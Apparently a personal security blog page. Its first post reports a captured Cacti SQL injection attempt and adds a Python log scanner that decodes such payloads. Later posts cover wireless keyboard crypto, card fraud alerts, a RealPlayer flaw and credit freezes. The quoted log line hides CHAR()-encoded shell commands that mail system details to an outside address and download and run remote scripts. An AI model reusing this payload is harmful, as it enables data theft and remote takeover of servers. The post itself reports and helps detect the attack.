Cacti SQL injection attack

I was going through some Apache access logs this morning and came across an attempted SQL injection attack. I don’t have Cacti on my server, so I wasn’t affected by the attempt. Here’s the request:

24.147.54.90 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,
CHAR(112,114,111,99),null,1,300,0,CHAR(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,
103,114,101,112,32,105,110,101,116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,
97,32,62,62,32,47,116,109,112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,
111,117,116,59,32,99,97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,54,54,
46,49,56,48,46,49,55,50,46,51,56,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,
111,111,46,99,111,109,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,32,45,79,32,47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,
47,116,109,112,47,116,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,46,112,108,32,45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,
47,116,46,112,108,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM
/**/host/*+11111 HTTP/1.0" 200 642 "-" "-"

It looks like someone out there has an automated bot going around attempting this injection attack everywhere.
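The request above is typical of what a scanner leaves in an access log: SQL keywords separated by empty comment sequences (/**/) to dodge naive filters, and the string literals wrapped in CHAR() calls so no quotes appear in the URL. The following script is an added example, not code from the original post; it parses Apache combined-format lines, normalizes the query string, flags the injection indicators seen in this request, and decodes CHAR() sequences so an analyst can read what the payload actually contained. The sample log lines, the indicator names and the IP addresses are all constructed for the example.

```python
import re
import urllib.parse

# Constructed sample lines (not the lines from the original post).
# Line 1: a Cacti-style UNION SELECT with comment obfuscation and a CHAR() literal.
# Line 2: an ordinary request that should not be flagged.
# Line 3: a URL-encoded quote/OR injection attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION'
    '/**/SELECT/**/2,0,CHAR(47,116,109,112,47,111,117,116),null/**/FROM/**/host/*+1'
    ' HTTP/1.0" 200 642 "-" "-"',
    '10.0.0.6 - - [04/Feb/2008:23:26:01 -0700] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [04/Feb/2008:23:27:15 -0700] "GET /search.php?q=1%27%20OR%20%271%27%3D%271'
    ' HTTP/1.1" 200 300 "-" "-"',
]

# Apache combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# MySQL CHAR(n,n,...) literal; the argument list is a run of decimal codes.
CHAR_RE = re.compile(r'CHAR\(([\d,\s]+)\)', re.IGNORECASE)

# Indicator names are the author's own labels for this example.
SQLI_PATTERNS = [
    ("union_select", re.compile(r'\bUNION\b.*\bSELECT\b', re.IGNORECASE)),
    ("quote_or", re.compile(r"'\s*OR\s*'", re.IGNORECASE)),
    ("char_encoding", re.compile(r'\bCHAR\(', re.IGNORECASE)),
    ("inline_comment", re.compile(r'/\*.*?\*/')),
]


def decode_char_calls(text):
    """Replace every CHAR(...) call with the quoted string it encodes."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(',') if c.strip()]
        return "'" + ''.join(chr(c) for c in codes) + "'"
    return CHAR_RE.sub(repl, text)


def analyze_line(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    match = LOG_RE.match(line)
    if not match:
        return None
    # Undo percent-encoding and '+' so keywords hidden by encoding become visible.
    decoded = urllib.parse.unquote_plus(match.group('path'))
    # Collapse /**/ comment sequences to a space so "UNION/**/SELECT" reads as "UNION SELECT".
    normalized = re.sub(r'/\*.*?\*/', ' ', decoded)
    indicators = [
        name for name, rx in SQLI_PATTERNS
        if rx.search(decoded) or rx.search(normalized)
    ]
    return {
        "ip": match.group('ip'),
        "timestamp": match.group('ts'),
        "path": match.group('path'),
        "indicators": indicators,
        # Human-readable view of the query with CHAR() literals decoded.
        "readable": decode_char_calls(normalized),
    }


def scan(lines):
    """Return findings only for lines that carry at least one injection indicator."""
    findings = []
    for line in lines:
        result = analyze_line(line)
        if result and result["indicators"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["timestamp"], f["indicators"])
        print("  ", f["readable"])
```

Run it against a real log with `scan(open("access_log").read().splitlines())`; the decoded view is the part worth keeping in an incident ticket, because the CHAR() argument lists in a request like the one above are unreadable until they are turned back into text.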

Wireless keyboard crypto cracked

Be aware that if you use Logitech or Microsoft wireless keyboards that rely on 27 MHz technology (non-Bluetooth), you may be open to someone listening in on every keystroke you make.
This is due to weak encryption. I have a hard time understanding why people think they can get away with shoddy security implementations.
This article and white paper give you more geek-speak about the underlying details. They specifically mention the Microsoft Wireless Optical Desktop 1000 and 2000 keyboards as being cracked.

News story
whitepaper – “We know what you typed last summer”

Credit Card – Declined

I recently made a laptop purchase from Circuit City online. During the checkout process, my business American Express (AmEx) card was declined. I tried my personal AmEx card and got the same result. I actually tried each of them a few times just to be sure I didn’t make a mistake when I entered the numbers on the payment page. I ended up making the purchase with my Visa and thought they might just be having trouble processing AmEx transactions at the time.
Later that day, I got a call from AmEx about suspicious transaction attempts. It turns out that the transactions were declined by AmEx because they were suspicious. I guess my card had been locked as a result.

I have mixed feelings about this. The consumer side of me thought, “wow, AmEx is really looking out for me.” I’m a patient shopper, so little inconveniences don’t bother me too much. I’m sure there are others that would be totally frustrated with any sort of inconvenience while ordering online. I’d rather have to jump through a hoop or two if it means stopping someone else from making unauthorized purchases on my account.

The online marketer in me thought, “How many sales are lost due to these false alerts?” In affiliate marketing, this is something that is far out of our control. It’s even out of the merchant’s control if the CC company decides to decline a transaction based on suspicion. I guess it’s a good thing that most merchants offer many methods of payment.

By contrast, when I made my first purchase from Amazon’s MP3 store things went a little too quickly. I clicked on “Buy this album” and my computer was instantly downloading the new MP3s without any warning. It made me uneasy that it was so simple to make a purchase. I didn’t even have to enter my credit card information; Amazon had that all stored for me since I had purchased from them previously. I’ve since enabled an option in my account so that I get a confirmation page prior to MP3 orders being placed.

RealPlayer Vulnerability

There’s a vulnerability in RealPlayer that will allow an attacker to run malicious code on your computer. All you need to do is visit a malicious site and that will do it. It’d be nice if there were warning signs before you go to a malicious site, but there are not.
Install this from Real to protect yourself from this vulnerability.

Here is more info on this vulnerability.

How to Freeze your Credit Report

It’s interesting that you can stop identity thieves cold by freezing your credit report. If you haven’t heard about this, it’s not surprising. According to this article, credit bureaus aren’t eager to promote it because they make good money pushing other identity theft prevention services. Freezes aren’t currently available in Utah, but credit bureaus are required by law to have them available by next year.


Google has full control of your content

I’m not sure I like this at all. I’m a fan of Google Apps. It’s nice to have central access to email, calendaring and some office apps. I’ll admit I’m on the paranoid side and don’t use the office apps for anything that contains sensitive information.
It looks like my paranoia may actually pay off.